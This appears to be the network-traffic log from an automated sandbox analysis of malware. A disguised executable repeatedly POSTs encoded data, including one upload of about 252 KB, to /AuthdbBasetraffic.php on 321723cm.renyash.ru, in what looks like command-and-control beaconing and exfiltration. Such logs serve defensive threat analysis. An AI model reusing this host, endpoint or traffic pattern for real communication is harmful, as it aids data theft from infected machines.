                                                                                                                          Dec 26, 2024 22:32:19.603705883 CET158INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:32:17 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 4
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 33 54 5e 50
                                                                                                                          Data Ascii: 3T^P


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          2192.168.2.44973637.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:32:21.439671040 CET305OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 2596
                                                                                                                          Expect: 100-continue
                                                                                                                          Dec 26, 2024 22:32:21.789572954 CET2596OUTData Raw: 57 50 58 5f 5e 58 53 5d 5d 58 52 5a 56 5a 54 52 5f 5f 58 48 59 5e 51 5a 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: WPX_^XS]]XRZVZTR__XHY^QZPY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ#Y/<9??+Y?%"<,!X <'Y&=-)9*2$1($"?? ].#[(
                                                                                                                          Dec 26, 2024 22:32:22.803172112 CET25INHTTP/1.1 100 Continue
                                                                                                                          Dec 26, 2024 22:32:23.059711933 CET158INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:32:20 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 4
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 33 54 5e 50
                                                                                                                          Data Ascii: 3T^P


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          3192.168.2.44974137.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:32:24.288054943 CET329OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 2592
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 26, 2024 22:32:24.633269072 CET2592OUTData Raw: 52 57 5d 59 5b 5c 56 5f 5d 58 52 5a 56 5d 54 57 5f 52 58 47 59 59 51 5e 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: RW]Y[\V_]XRZV]TW_RXGYYQ^PY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ ;,->Z;_=6!<,&#? '>>\))9\1X3<-+1( ].#[(2


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          4192.168.2.44974237.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:32:24.879385948 CET329OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 1908
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 26, 2024 22:32:25.227118969 CET1908OUTData Raw: 57 52 5d 5d 5e 5b 56 59 5d 58 52 5a 56 5d 54 5b 5f 59 58 44 59 59 51 5d 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: WR]]^[VY]XRZV]T[_YXDYYQ]PY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ 8Y-?<$=6%](Z)7,;%-&X=*%Y&Z$+1+ ].#[(
                                                                                                                          Dec 26, 2024 22:32:26.242075920 CET25INHTTP/1.1 100 Continue
                                                                                                                          Dec 26, 2024 22:32:26.499861002 CET308INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:32:24 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 152
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 01 1c 24 01 27 2d 2b 05 20 02 20 5e 3f 07 31 0f 21 2c 3a 40 25 39 23 12 3f 02 0c 10 3c 0d 32 54 27 2a 0c 19 35 11 37 0a 28 08 27 10 29 0c 2b 59 01 1d 23 5f 27 05 01 04 30 2a 03 11 2d 59 24 1b 29 36 26 5c 29 2a 3c 09 3f 3b 0b 5a 20 31 2a 17 3c 07 0b 03 2d 3c 3d 19 3c 1e 21 51 27 07 2c 51 02 11 38 1d 23 21 21 50 35 06 24 57 3e 1d 27 13 36 2a 33 0a 25 3e 36 0f 27 5a 2e 17 27 3c 29 01 27 34 2c 50 33 2b 08 40 26 0c 0e 1f 24 3f 20 5e 22 0e 2b 54 0d 3e 5c 52
                                                                                                                          Data Ascii: $'-+ ^?1!,:@%9#?<2T'*57(')+Y#_'0*-Y$)6&\)*<?;Z 1*<-<=<!Q',Q8#!!P5$W>'6*3%>6'Z.'<)'4,P3+@&$? ^"+T>\R


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          5192.168.2.44974337.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:32:25.703663111 CET329OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 2596
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 26, 2024 22:32:26.523304939 CET2596OUTData Raw: 57 5c 58 5c 5b 5c 56 59 5d 58 52 5a 56 5a 54 54 5f 5f 58 45 59 58 51 5f 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: W\X\[\VY]XRZVZTT__XEYXQ_PY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ#8>\>,#=*<<-[771(99]&Z$<.^<'-</ ].#[(
                                                                                                                          Dec 26, 2024 22:32:27.065651894 CET25INHTTP/1.1 100 Continue
                                                                                                                          Dec 26, 2024 22:32:27.319859982 CET158INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:32:24 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 4
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 33 54 5e 50
                                                                                                                          Data Ascii: 3T^P


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          6192.168.2.44974637.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:32:32.349384069 CET305OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 1900
                                                                                                                          Expect: 100-continue


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          7192.168.2.44974737.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:32:32.574363947 CET329OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 2596
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 26, 2024 22:32:32.930226088 CET2596OUTData Raw: 57 57 5d 5b 5b 59 53 5d 5d 58 52 5a 56 58 54 57 5f 52 58 42 59 5c 51 53 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: WW][[YS]]XRZVXTW_RXBY\QSPY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ 8*>Z<=&<=4<4&:Z*9&&"$"=$1( ].#[(6
                                                                                                                          Dec 26, 2024 22:32:33.890842915 CET25INHTTP/1.1 100 Continue
                                                                                                                          Dec 26, 2024 22:32:34.144341946 CET158INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:32:31 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 4
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 33 54 5e 50
                                                                                                                          Data Ascii: 3T^P


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          8192.168.2.44974937.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:32:35.719075918 CET305OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 2596
                                                                                                                          Expect: 100-continue
                                                                                                                          Dec 26, 2024 22:32:36.070785999 CET2596OUTData Raw: 57 51 5d 5f 5b 58 53 5b 5d 58 52 5a 56 5f 54 54 5f 5c 58 48 59 5c 51 5e 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: WQ]_[XS[]XRZV_TT_\XHY\Q^PY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ#8Y!>X?6!]),-Y#,31"=:6%Z$Y=='9)? ].#[(*
                                                                                                                          Dec 26, 2024 22:32:37.081674099 CET25INHTTP/1.1 100 Continue
                                                                                                                          Dec 26, 2024 22:32:37.335892916 CET158INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:32:34 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 4
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 33 54 5e 50
                                                                                                                          Data Ascii: 3T^P


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          9192.168.2.44975037.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:32:37.772131920 CET329OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 1924
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          10192.168.2.44975137.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:32:38.227785110 CET329OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 2596
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 26, 2024 22:32:38.586309910 CET2596OUTData Raw: 52 50 5d 59 5e 5d 56 58 5d 58 52 5a 56 58 54 50 5f 5b 58 40 59 5e 51 5e 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: RP]Y^]VX]XRZVXTP_[X@Y^Q^PY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ#Y,,9>/>"</= 8'->&23!Z'<Q9)? ].#[(6
                                                                                                                          Dec 26, 2024 22:32:40.099612951 CET25INHTTP/1.1 100 Continue
                                                                                                                          Dec 26, 2024 22:32:40.351991892 CET158INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:32:37 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 4
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 33 54 5e 50
                                                                                                                          Data Ascii: 3T^P


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          11192.168.2.44975237.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:32:40.977175951 CET305OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 2596
                                                                                                                          Expect: 100-continue
                                                                                                                          Dec 26, 2024 22:32:41.336354017 CET2596OUTData Raw: 57 56 5d 5b 5e 5c 56 5e 5d 58 52 5a 56 5c 54 56 5f 5f 58 46 59 5a 51 52 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: WV][^\V^]XRZV\TV__XFYZQRPY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ#Y,?=*;=%?& %-:Y*\=]&-\&<.+)+ ].#[(&


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          12192.168.2.44975337.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:32:42.311273098 CET331OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 252276
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 26, 2024 22:32:42.664716005 CET12360OUTData Raw: 57 5d 58 5e 5b 5e 56 5f 5d 58 52 5a 56 5e 54 5b 5f 52 58 48 59 59 51 58 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: W]X^[^V_]XRZV^T[_RXHYYQXPY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ#_81)<;*69\</5["??^1=.[=*Z%6$<"[+(? ].#[(.
                                                                                                                          Dec 26, 2024 22:32:42.784619093 CET4944OUTData Raw: 25 2a 3a 00 08 09 08 55 28 06 14 5a 02 2e 04 41 2a 20 3e 33 3d 5c 50 2e 28 2f 2b 1c 0d 22 2a 35 38 00 45 11 04 57 06 0b 22 14 24 14 3e 31 39 10 33 05 1b 03 3b 01 2d 1d 0e 0e 1d 22 0c 39 07 3a 3f 56 3f 54 3e 5f 27 38 25 55 0d 15 27 57 00 3f 0c 01
                                                                                                                          Data Ascii: %*:U(Z.A* >3=\P.(/+"*58EW"$>193;-"9:?V?T>_'8%U'W??$;93'?:4R2,V&01<0",+/<%#*5.>(.8>Y<#X6!X06=.?-X<('832-;C\2*->?9%9[7(/>/#?5%92%%00V%(T8)$"8!T81[;(Y'.
                                                                                                                          Dec 26, 2024 22:32:42.784698009 CET4944OUTData Raw: 3c 15 24 2d 3b 3d 28 18 0e 59 29 25 31 3c 23 25 0f 1f 0f 39 0f 31 33 21 3a 37 2b 53 20 25 28 04 26 33 02 18 30 06 5e 28 3d 2b 57 39 29 08 55 21 34 03 5c 19 23 2e 34 3f 0d 2c 5e 59 2a 26 00 2e 31 3c 2a 25 27 3e 25 13 3f 0d 32 11 28 3b 0a 5f 34 2d
                                                                                                                          Data Ascii: <$-;=(Y)%1<#%913!:7+S %(&30^(=+W9)U!4\#.4?,^Y*&.1<*%'>%?2(;_4-! &\41'?0A-!$+4YYX8/0%?-F=:4+>0=0$\9="4"-8>,;6>^R9?Q=*[&U6*8%:9Y%)U!?)7+4[U>W;=0S>WG&8;/(<X!=%X>&(8"C%
                                                                                                                          Dec 26, 2024 22:32:42.784774065 CET4944OUTData Raw: 2a 2d 00 06 33 0b 2d 39 02 07 3a 1b 30 03 34 2b 3e 43 31 38 32 11 5b 06 30 0c 1a 2e 32 03 09 5b 34 05 3b 01 33 2a 31 30 22 2d 3d 05 08 3e 16 19 34 30 03 19 32 23 29 15 24 04 32 09 3f 59 54 12 24 3d 28 13 01 21 0a 20 28 56 2c 26 33 38 3f 26 3b 5d
                                                                                                                          Data Ascii: *-3-9:04+>C182[0.2[4;3*10"-=>402#)$2?YT$=(! (V,&38?&;]87. @'!3?72&9U[R*;)4+3W8+6*?=#5+$4/$0562>0$YV>01>9:$!81:#?%WX<3*\+!3#<.#:%*X8T90 78?2(6=1;0Z'79-Z2!ZKZ?R;& 6
                                                                                                                          Dec 26, 2024 22:32:42.784893036 CET4944OUTData Raw: 0e 5c 22 04 06 23 20 04 2a 50 32 5c 04 14 5f 2e 11 5c 18 25 34 3d 07 37 2b 5f 2e 10 34 05 0c 42 30 22 00 0a 08 38 27 53 05 3e 23 51 08 30 04 3c 3c 2c 40 37 06 09 38 06 39 5e 1e 51 26 02 36 0b 33 5a 13 18 08 5a 0b 30 09 0d 0d 54 26 3b 31 28 0a 31
                                                                                                                          Data Ascii: \"# *P2\_.\%4=7+_.4B0"8'S>#Q0<<,@789^Q&63ZZ0T&;1(135<;P#91;9:(< /+9?9>8+W9954\U7094' $4/R$Y_%:%0>;ZG2<Z\**[=;X!-=1/P12)'*]/(1?,!9%)/2-[#(]8P-2(5"["B8,;?2R3$+.:/<0
                                                                                                                          Dec 26, 2024 22:32:42.784931898 CET4944OUTData Raw: 3f 0a 28 51 08 01 3f 3b 38 30 3b 34 09 32 04 00 3b 15 24 0a 26 31 0d 0e 08 2e 35 34 0f 2d 2b 31 23 24 13 1b 0f 33 2b 57 09 1e 27 56 3a 2a 19 5d 12 1f 30 2a 00 11 3d 3b 22 06 01 11 3d 50 21 5d 07 3f 2d 11 08 04 20 5c 0a 2e 0f 1d 03 2b 1c 10 0b 30
                                                                                                                          Data Ascii: ?(Q?;80;42;$&1.54-+1#$3+W'V:*]0*=;"=P!]?- \.+06&=^-+914^Y3,%6>!Y.(!5_3%*5/]+3?>/,4.%?;463"A3;+X=9=.$)"$=Y1;6T<;%&"?!=7::=]Y>)P*(V+.?1%(*U$:/<V##=P$Z#2G=>*V2>=<)
                                                                                                                          Dec 26, 2024 22:32:42.904544115 CET7416OUTData Raw: 3c 09 18 3b 3b 3e 31 32 3f 0e 39 10 33 28 2b 27 30 06 25 24 30 27 21 21 2a 5e 39 01 06 3c 53 58 3e 41 25 35 34 2c 37 5b 06 20 06 2e 23 5a 3f 19 39 3f 27 05 3f 2b 29 36 21 3d 39 23 0e 5f 16 19 31 3e 36 5b 01 0c 3d 10 21 5e 32 26 3a 5a 05 35 20 3d
                                                                                                                          Data Ascii: <;;>12?93(+'0%$0'!!*^9<SX>A%54,7[ .#Z?9?'?+)6!=9#_1>6[=!^2&:Z5 =4(Z_0$%"_3$*20X6180$\86V<XSB*7]_U,ZD#51.!.V*#Y61:U/,%?>/%%EV?+3%X>!9(ZX?+#Z%$-3045 ?V+#;3_5(8"0$>=:$;W=R.3Z
                                                                                                                          Dec 26, 2024 22:32:42.904689074 CET2472OUTData Raw: 0c 3d 0f 23 32 2a 07 5c 0b 32 22 06 3d 58 07 5a 25 08 25 1c 32 5e 0d 5d 03 06 04 43 3c 37 29 59 37 5f 2d 3a 02 3f 3c 00 39 26 21 18 34 02 34 04 29 54 28 3c 25 3c 0d 05 3c 58 0d 59 07 5f 17 3b 35 5a 31 1b 09 00 38 0b 3f 06 0b 1a 30 21 0f 37 0e 03
                                                                                                                          Data Ascii: =#2*\2"=XZ%%2^]C<7)Y7_-:?<9&!44)T(<%<<XY_;5Z18?0!7=53W+2,0>'3X;*96=;=&4U8"56\9*:?%#V>)0034T:<3Q1U(88P%>U0%_YR371C?V2:;$1'TU&7_<,';>Y>-0'C[&?/P#@(9:_!%S79"'
                                                                                                                          Dec 26, 2024 22:32:42.904716969 CET2472OUTData Raw: 0a 3f 2d 18 25 11 39 1d 0b 52 01 04 3d 15 2d 18 3c 23 30 1c 0e 07 0a 5b 39 33 33 1f 26 20 22 36 0a 38 23 5b 26 2d 0d 30 0f 2e 1f 01 3d 58 16 51 08 26 21 27 3c 30 3c 1e 0b 1d 30 34 3b 01 1e 3f 3d 0e 02 34 37 2c 2e 5e 26 3e 2f 5b 2a 0c 2a 20 03 06
                                                                                                                          Data Ascii: ?-%9R=-<#0[933& "68#[&-0.=XQ&!'<0<04;?=47,.^&>/[** 2?&6=1=\"Y1$S(?;>=3%^6[W&$R=5SX7(\&.P %)09/)=<)>1!156>%8//<1/Z0#,Z(R$*XY'X:<0#2:-.49)*<!S4;SE6U 8]/=+ =V";X4
                                                                                                                          Dec 26, 2024 22:32:42.945590973 CET28428OUTData Raw: 3b 00 21 44 0f 3f 23 16 15 2d 0e 5a 07 57 1a 27 01 33 5e 1c 26 2a 1d 5f 3b 5e 54 11 01 3f 06 23 31 51 07 5b 28 39 02 0b 3d 5e 22 1f 0c 20 5b 19 07 17 2d 3f 35 2f 2d 21 07 23 00 0c 3e 00 33 0f 03 04 23 17 39 0c 2a 55 0a 07 23 54 29 30 4b 2f 22 36
                                                                                                                          Data Ascii: ;!D?#-ZW'3^&*_;^T?#1Q[(9=^" [-?5/-!#>3#9*U#T)0K/"6?*1>)4>0#:^3 '1%8T7=V&'5(4?!+;#9,/95"3$BS 8*08R?$;"4<&27<8%:R*X&<<2( ;1>-=6,(^1<)1?/$?3_0]!?)185:Y1
                                                                                                                          Dec 26, 2024 22:32:43.673618078 CET25INHTTP/1.1 100 Continue
                                                                                                                          Dec 26, 2024 22:32:44.188976049 CET25INHTTP/1.1 100 Continue
                                                                                                                          Dec 26, 2024 22:32:45.044975996 CET158INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:32:42 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 4
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 33 54 5e 50
                                                                                                                          Data Ascii: 3T^P
